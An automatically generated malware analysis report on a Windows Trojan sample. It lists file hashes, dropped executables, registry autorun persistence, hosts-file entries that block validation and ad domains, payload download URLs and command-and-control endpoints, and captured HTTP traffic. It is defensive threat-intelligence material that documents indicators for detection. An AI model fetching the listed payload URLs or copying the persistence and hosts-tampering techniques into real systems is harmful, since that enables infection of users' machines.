Trojan.MSIL.DOTHETUK.jez_c4fa995d7e

by malwarelabrobot on September 29th, 2017 in Malware Descriptions.

Trojan.MSIL.DOTHETUK.jez (Kaspersky), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: c4fa995d7ed1670ba8f720242f87dde6
SHA1: 31c1d7fd52f76345de4299c1586f39c7ea7c9280
SHA256: daf2e16d4b2fc634054d9beacaa2e0c73ef083c01f648086e739c16c69adbaa5
SSDeep: 12288:1Qi3vJwdFszzh1N1J96n1ex9KhjHLZeBQNP0:1QifJwdF4N1yn1eXmjYYP0
Size: 492588 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: no certificate found
Created at: 1992-06-20 01:22:17
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

c4fa995d7ed1670ba8f720242f87dde6.tmp:3404
dw.exe:3584
DOCPSADOPK.exe:3808
%original file name%.exe:1796

The Trojan injects its code into the following process(es):

OPLKIDMWLL.exe:2892
UBWBZWLKRG.exe:948

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process c4fa995d7ed1670ba8f720242f87dde6.tmp:3404 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MQUT5.tmp\dw.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MQUT5.tmp\itdownload.dll (1489 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MQUT5.tmp\_isetup\_shfoldr.dll (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MQUT5.tmp\dw.exe (12675 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MQUT5.tmp\dw.exe.config (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MQUT5.tmp\dw.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MQUT5.tmp\_isetup\_shfoldr.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MQUT5.tmp\_isetup (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MQUT5.tmp\itdownload.dll (0 bytes)

The process OPLKIDMWLL.exe:2892 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\drivers\etc\hosts (1 bytes)

The process dw.exe:3584 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Mozilla Firefox\UDKKVOSOVF\CHXOCZMVSI.exe (243 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\OPLKIDMWLL.exe (233 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\OPLKIDMWLL.exe.config (1 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\DOCPSADOPK.cfg (88 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\OPLKIDMWLL.cfg (88 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\DOCPSADOPK.exe.config (1 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\UBWBZWLKRG.exe (833 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\DOCPSADOPK.exe (1136 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (844 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\UBWBZWLKRG.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (844 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\UBWBZWLKRG.cfg (88 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\CHXOCZMVSI.cfg (88 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\CHXOCZMVSI.exe.config (1 bytes)

The process DOCPSADOPK.exe:3808 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (872 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (872 bytes)
%Program Files%\Mozilla Firefox\UDKKVOSOVF\DOCPSADOPK.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (872 bytes)

The Trojan deletes the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.3808.346213 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.3808.346213 (0 bytes)

The process %original file name%.exe:1796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UDAF0.tmp\c4fa995d7ed1670ba8f720242f87dde6.tmp (1622 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UDAF0.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UDAF0.tmp\c4fa995d7ed1670ba8f720242f87dde6.tmp (0 bytes)

Registry activity

The process c4fa995d7ed1670ba8f720242f87dde6.tmp:3404 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\RestartManager\Session0000]
"Sequence" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\c4fa995d7ed1670ba8f720242f87dde6_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\RestartManager\Session0000]
"SessionHash" = "9E 30 E3 12 E0 A3 51 9D 9F 9A 40 B9 9B 81 DD DB"

[HKLM\SOFTWARE\Microsoft\Tracing\c4fa995d7ed1670ba8f720242f87dde6_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\c4fa995d7ed1670ba8f720242f87dde6_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\RestartManager\Session0000]
"Owner" = "4C 0D 00 00 18 A8 F6 8C 07 38 D3 01"

[HKLM\SOFTWARE\Microsoft\Tracing\c4fa995d7ed1670ba8f720242f87dde6_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\c4fa995d7ed1670ba8f720242f87dde6_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\c4fa995d7ed1670ba8f720242f87dde6_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\c4fa995d7ed1670ba8f720242f87dde6_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\c4fa995d7ed1670ba8f720242f87dde6_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\RestartManager\Session0000]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\RestartManager\Session0000]
"Sequence"
"SessionHash"
"Owner"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"
"AutoConfigURL"

The process dw.exe:3584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\dw_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Printers\Ippolito]
"Sikkes" = "09/28/2017 06:12:08"
"Ofrah" = "08:00:00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\System\CurrentControlSet\Control\Print]
"reinstall_drivers" = "3bje16uWXYAVJ8EWhxV05Jpn4lBzO9G3NOAf1kn8HcA="

[HKLM\SOFTWARE\Microsoft\Tracing\dw_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\dw_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\dw_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKCU\Software\Nowidget]
"State" = "Success"

[HKLM\SOFTWARE\Microsoft\Tracing\dw_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\dw_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\dw_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\dw_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\dw_RASAPI32]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process DOCPSADOPK.exe:3808 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\DOCPSADOPK_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\DOCPSADOPK_RASAPI32]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\DOCPSADOPK_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\DOCPSADOPK_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\DOCPSADOPK_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\DOCPSADOPK_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\DOCPSADOPK_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\DOCPSADOPK_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\DOCPSADOPK_RASMANCS]
"EnableConsoleTracing" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"DOCPSADOPK.exe" = "%Program Files%\Mozilla Firefox\UDKKVOSOVF\DOCPSADOPK.exe"

The process UBWBZWLKRG.exe:948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\UBWBZWLKRG_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\UBWBZWLKRG_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\UBWBZWLKRG_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\UBWBZWLKRG_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\UBWBZWLKRG_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\UBWBZWLKRG_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\UBWBZWLKRG_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\UBWBZWLKRG_RASMANCS]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\UBWBZWLKRG_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\UBWBZWLKRG_RASMANCS]
"MaxFileSize" = "1048576"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"UBWBZWLKRG.exe" = "%Program Files%\Mozilla Firefox\UDKKVOSOVF\UBWBZWLKRG.exe"

The Trojan deletes the following value(s) in system registry:

Dropped PE files

MD5	File path
98d637ab2a82bddc0bdd83f7d1058400	c:\Program Files\Mozilla Firefox\UDKKVOSOVF\CHXOCZMVSI.exe
ab0627f1df2476e7e87ee42f54a87511	c:\Program Files\Mozilla Firefox\UDKKVOSOVF\DOCPSADOPK.exe
b74370f9fbb85f71ff85225852fd7446	c:\Program Files\Mozilla Firefox\UDKKVOSOVF\OPLKIDMWLL.exe
2bcb8b3244b045e0161aaeba45b0735c	c:\Program Files\Mozilla Firefox\UDKKVOSOVF\UBWBZWLKRG.exe
ad7ce1d4a70bb4a5b1731faebe1af863	c:\Program Files\VMware\IMMWDEWSFY\QUSEWTHJKZ.exe

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 1872 bytes in size. The following strings are added to the hosts file listed below:

127.0.0.1	validation.sls.microsoft.com
127.0.0.1	wemsofts.com
127.0.0.1	bongadoom.com
127.0.0.1	wepcmainsystem.com
127.0.0.1	internalcampaigntargets.com
127.0.0.1	bongadoom.com
127.0.0.1	getthefilenow.com
127.0.0.1	bigpicturepop.com
127.0.0.1	wizzcaster.com
127.0.0.1	bestoffersfortoday.com
127.0.0.1	wepcmainsystem.com
127.0.0.1	agent.wizztrakys.com
127.0.0.1	csdimonetize.com
127.0.0.1	dl.azalee.site
127.0.0.1	titiaredh.com
127.0.0.1	wepcdisplaysystem.com
127.0.0.1	wepcanalyticsystem.com
127.0.0.1	healthydownload.com
127.0.0.1	leading2download.com
127.0.0.1	dwl0.wizzlabs.com
127.0.0.1	dwl1.wizzlabs.com
127.0.0.1	mess1.wizzmonetize.com
127.0.0.1	dl.azalee.site
127.0.0.1	dl.smashdl.com
127.0.0.1	downloadmyhost.com
127.0.0.1	lapapahoster.com
127.0.0.1	bratitlamio.com
127.0.0.1	mess1.wizzmonetize.com
127.0.0.1	dl.wizzuniquify.com
127.0.0.1	wizzmonetize.com
127.0.0.1	laserveradedomaina.com

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: 016
Product Version: 4.2
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description: 016 Setup
Comments: This installation was built with Inno Setup.
Language: English (United States)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
CODE	4096	40240	40448	4.59678	611a4d7a24dd9b18a256468a5d7453f5
DATA	45056	592	1024	1.90942	2f7f9f859c8b4b133abf78cebd99cc90
BSS	49152	3728	0	0	d41d8cd98f00b204e9800998ecf8427e
.idata	53248	2384	2560	3.07115	bb5485bf968b970e5ea81292af2acdba
.tls	57344	8	0	0	d41d8cd98f00b204e9800998ecf8427e
.rdata	61440	24	512	0.14174	9ba824905bf9c7922b6fc87a38b74366
.reloc	65536	2244	0	0	d41d8cd98f00b204e9800998ecf8427e
.rsrc	69632	110660	111104	1.85254	668649b89fb7d6d977db8bc1c1af5a19

Dropped from:

94df91a4c39f8578be321137aa5d4e54

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://mydownloaddomain.com/Download/Domain/dw.exe	5.135.84.92
hxxp://htagzdownload.pw/Series/Conumer1Pirlo.php	51.254.189.96
hxxp://smarttrackk.xyz/temptrack/Store	193.70.81.176
hxxp://mydownloaddomain.com/HNK45/FTGHUIO6/Dance.exe	5.135.84.92
hxxp://mydownloaddomain.com/uploads/akil/xx13.exe	5.135.84.92
hxxp://mydownloaddomain.com/uploads/akil/xx12.exe	5.135.84.92
hxxp://mydownloaddomain.com/uploads/EmreExe/Recover.exe	5.135.84.92
hxxp://mydownloaddomain.com/HNK45/FTGHUIO6/Twerk.exe	5.135.84.92
hxxp://www.google.com/	172.217.20.196
hxxp://www.google.com.ua/?gfe_rd=cr&dcr=0&ei=iWjMWZLmJcLi8AfJxbrgDQ	172.217.20.163
hxxp://htagzdownload.pw/Series/Conumer4Publisher.php	51.254.189.96
hxxp://htagzdownload.pw/Series/Movie/Ragnar/2/UA.json	51.254.189.96
hxxp://htagzdownload.pw/Series/Conumer2kenpachi.php	51.254.189.96
hxxp://htagzdownload.pw/Series/dracarysfisormek/2/goodchannel/UA.json	51.254.189.96
hxxp://htagzdownload.pw/Series/daenerystargaryen/2/goodchannel.json	51.254.189.96
hxxp://apps.digsigtrust.com/roots/dstrootcax3.p7c
hxxp://a767.dspw65.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab
hxxp://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf/EFWCFiRACEAoBQUIAAAFThXNqC4Xspwg=	192.35.177.195
hxxp://a771.dscq.akamai.net/MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgNjdonEncxBy5w7PlZkeo4nVg==
hxxp://ocsp.godaddy.com.akadns.net//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH+3ahq1OMCAxvnFQ==	50.63.243.230
hxxp://ocsp.godaddy.com.akadns.net//MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQdI2+OBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc=	50.63.243.230
hxxp://ocsp.godaddy.com.akadns.net//MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQDB+8Myi49ySg==	50.63.243.230
hxxp://d.gcdn.co/pokermatch/podarok200/images/logo-pokermatch.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/chip-3.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/chip-1.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/f-icon-2.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/f-icon-3.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/f-icon-4.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/f-icon-5.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/f-icon-6.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/app-windows.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/app-macos-x.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/app-google-play.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/app-ios.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/text-200uah.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/chip-2.png
hxxp://d.gcdn.co/pokermatch/podarok200/images/f-icon-1.png
hxxp://gdcrl.godaddy.com.akadns.net/gdig2s1-455.crl
hxxp://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI=	178.255.83.1
hxxp://cs9.wac.phicdn.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEATh56TcXPLzbcArQrhdFZ8=
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/app-windows.png	1.100.192.22
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/f-icon-4.png	1.100.192.22
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/logo-pokermatch.png	1.100.192.22
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/chip-2.png	1.100.192.22
hxxp://apps.identrust.com/roots/dstrootcax3.p7c	192.35.177.64
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/app-google-play.png	1.100.192.22
hxxp://ocsp.int-x3.letsencrypt.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgNjdonEncxBy5w7PlZkeo4nVg==	2.21.240.107
hxxp://ocsp.godaddy.com//MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQdI2+OBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc=	50.63.243.230
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/app-ios.png	1.100.192.22
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/chip-1.png	1.100.192.22
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/f-icon-1.png	1.100.192.22
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/f-icon-6.png	1.100.192.22
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/f-icon-3.png	1.100.192.22
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/app-macos-x.png	1.100.192.22
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/f-icon-2.png	1.100.192.22
hxxp://crl.godaddy.com/gdig2s1-455.crl	50.63.243.228
hxxp://ocsp.godaddy.com//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH+3ahq1OMCAxvnFQ==	50.63.243.230
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/chip-3.png	1.100.192.22
hxxp://ocsp.godaddy.com//MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQDB+8Myi49ySg==	50.63.243.230
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab	92.123.155.48
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/text-200uah.png	1.100.192.22
hxxp://imglands1.gcdn.co/pokermatch/podarok200/images/f-icon-5.png	1.100.192.22
hxxp://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEATh56TcXPLzbcArQrhdFZ8=	93.184.220.29
promo.pokermatch.com	88.208.33.209
syndication.exdynsrv.com	95.211.229.246
google.com	172.217.20.206
cdn.gravitec.net	91.239.235.23
teredo.ipv6.microsoft.com

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
ET POLICY PE EXE or DLL Windows file download HTTP
ET POLICY Terse Named Filename EXE Download - Possibly Hostile
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEATh56TcXPLzbcArQrhdFZ8= HTTP/1.1

Cache-Control: max-age = 511667

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Thu, 13 Oct 2016 04:57:34 GMT

If-None-Match: "57ff143e-1d7"

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.digicert.com


HTTP/1.1 200 OK

Accept-Ranges: bytes

Cache-Control: max-age=172800

Content-Type: application/ocsp-response

Date: Thu, 28 Sep 2017 03:12:58 GMT

Etag: "59cc26af-1d7"

Expires: Sat, 30 Sep 2017 03:12:58 GMT

Last-Modified: Wed, 27 Sep 2017 22:31:11 GMT

Server: ECS (vie/F2D5)

X-Cache: HIT

Content-Length: 471
0..........0..... .....0......0...0.......>.i...G...&....cd ...2017
0926220000Z0s0q0I0... ............(..A...B..G@B.X....>.i...G...&...
.cd ........\..m. B.]......20170926220000Z....20171003220000Z0...*.H..
................A...]"..U....jd..;..}F.......>{Y..6.PC.i..RZ..C.=..
|........m.KYD..PH..._.$....;W..o.......).../...t1$.QR.?:...&.@..-T..}
...@....F...q....17.....J.......J...Lt....N....W.......:4e.veF.......@
 #UBX......`]..`....!.gg.@...M..p....|u.F..<d.m.|.^:...l.B..HTTP/1.
1 200 OK..Accept-Ranges: bytes..Cache-Control: max-age=172800..Content
-Type: application/ocsp-response..Date: Thu, 28 Sep 2017 03:12:58 GMT.
.Etag: "59cc26af-1d7"..Expires: Sat, 30 Sep 2017 03:12:58 GMT..Last-Mo
dified: Wed, 27 Sep 2017 22:31:11 GMT..Server: ECS (vie/F2D5)..X-Cache
: HIT..Content-Length: 471..0..........0..... .....0......0...0.......
>.i...G...&....cd ...20170926220000Z0s0q0I0... ............(..A...B
..G@B.X....>.i...G...&....cd ........\..m. B.]......20170926220000Z
....20171003220000Z0...*.H..................A...]"..U....jd..;..}F....
...>{Y..6.PC.i..RZ..C.=..|........m.KYD..PH..._.$....;W..o.......).
../...t1$.QR.?:...&.@..-T..}...@....F...q....17.....J.......J...Lt....
N....W.......:4e.veF.......@ #UBX......`]..`....!.gg.@...M..p....|u.F.
.<d.m.|.^:...l.B....<<< skipped >>>

GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgNjdonEncxBy5w7PlZkeo4nVg== HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.int-x3.letsencrypt.org


HTTP/1.1 200 OK

Server: nginx

Content-Type: application/ocsp-response

Content-Length: 527

ETag: "776C990E2D90416A6E43881D116898B805FA84DA3E6646542237076A2092BD58"

Last-Modified: Tue, 26 Sep 2017 10:00:00 UTC

Cache-Control: public, no-transform, must-revalidate, max-age=9588

Expires: Thu, 28 Sep 2017 05:52:21 GMT

Date: Thu, 28 Sep 2017 03:12:33 GMT

Connection: keep-alive
0..........0..... .....0......0...0...L0J1.0...U....US1.0...U....Let's
 Encrypt1#0!..U....Let's Encrypt Authority X3..20170926102300Z0u0s0K0.
.. ........~.j.r..... dl..-`q.]...Jjc.}....9..Ee........cv....A..;>
Vdz.'V....20170926100000Z....20171003100000Z0...*.H.............%....&
gt;..5"..k..Z...q.9....e]......I...D....1.^6.......k...(_.L.?........6
V'......>.-....!.....H..../a.TX..(...Q...~..~`.....Zf....8V..\j...;
..-v..x...p.w.fO.N".D.AT..].V.....}..?../!..u..3:%...Z?m....aA..X4..].
....^z..l....Qn..L........-...Y...O=..........HTTP/1.1 200 OK..Server:
 nginx..Content-Type: application/ocsp-response..Content-Length: 527..
ETag: "776C990E2D90416A6E43881D116898B805FA84DA3E6646542237076A2092BD5
8"..Last-Modified: Tue, 26 Sep 2017 10:00:00 UTC..Cache-Control: publi
c, no-transform, must-revalidate, max-age=9588..Expires: Thu, 28 Sep 2
017 05:52:21 GMT..Date: Thu, 28 Sep 2017 03:12:33 GMT..Connection: kee
p-alive..0..........0..... .....0......0...0...L0J1.0...U....US1.0...U
....Let's Encrypt1#0!..U....Let's Encrypt Authority X3..20170926102300
Z0u0s0K0... ........~.j.r..... dl..-`q.]...Jjc.}....9..Ee........cv...
.A..;>Vdz.'V....20170926100000Z....20171003100000Z0...*.H..........
...%....>..5"..k..Z...q.9....e]......I...D....1.^6.......k...(_.L.?
........6V'......>.-....!.....H..../a.TX..(...Q...~..~`.....Zf....8
V..\j...;..-v..x...p.w.fO.N".D.AT..].V.....}..?../!..u..3:%...Z?m....a
A..X4..].....^z..l....Qn..L........-...Y...O=............<<< skipped >>>

POST /Series/Conumer2kenpachi.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: htagzdownload.pw

Content-Length: 53

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue

....

charizar=A5wGycGnuqFFGLQczpRIbh53b1gu3AGAo5ty9EN5tEg=

HTTP/1.1 200 OK

Server: nginx/1.10.3 (Ubuntu)

Date: Thu, 28 Sep 2017 03:12:10 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

30d.....cv/g6g6pYaOuCPQQIXErWnJfaRcpz68Hg8SZMDO8/slNkc73T1DyVzyULnhIif
eCNlLuaH h1BAz0ydGrFEUTLc7U3 rWTJTPLBGnzPgu9J43zNsK7VqGNs6vbz0uZVj RSM
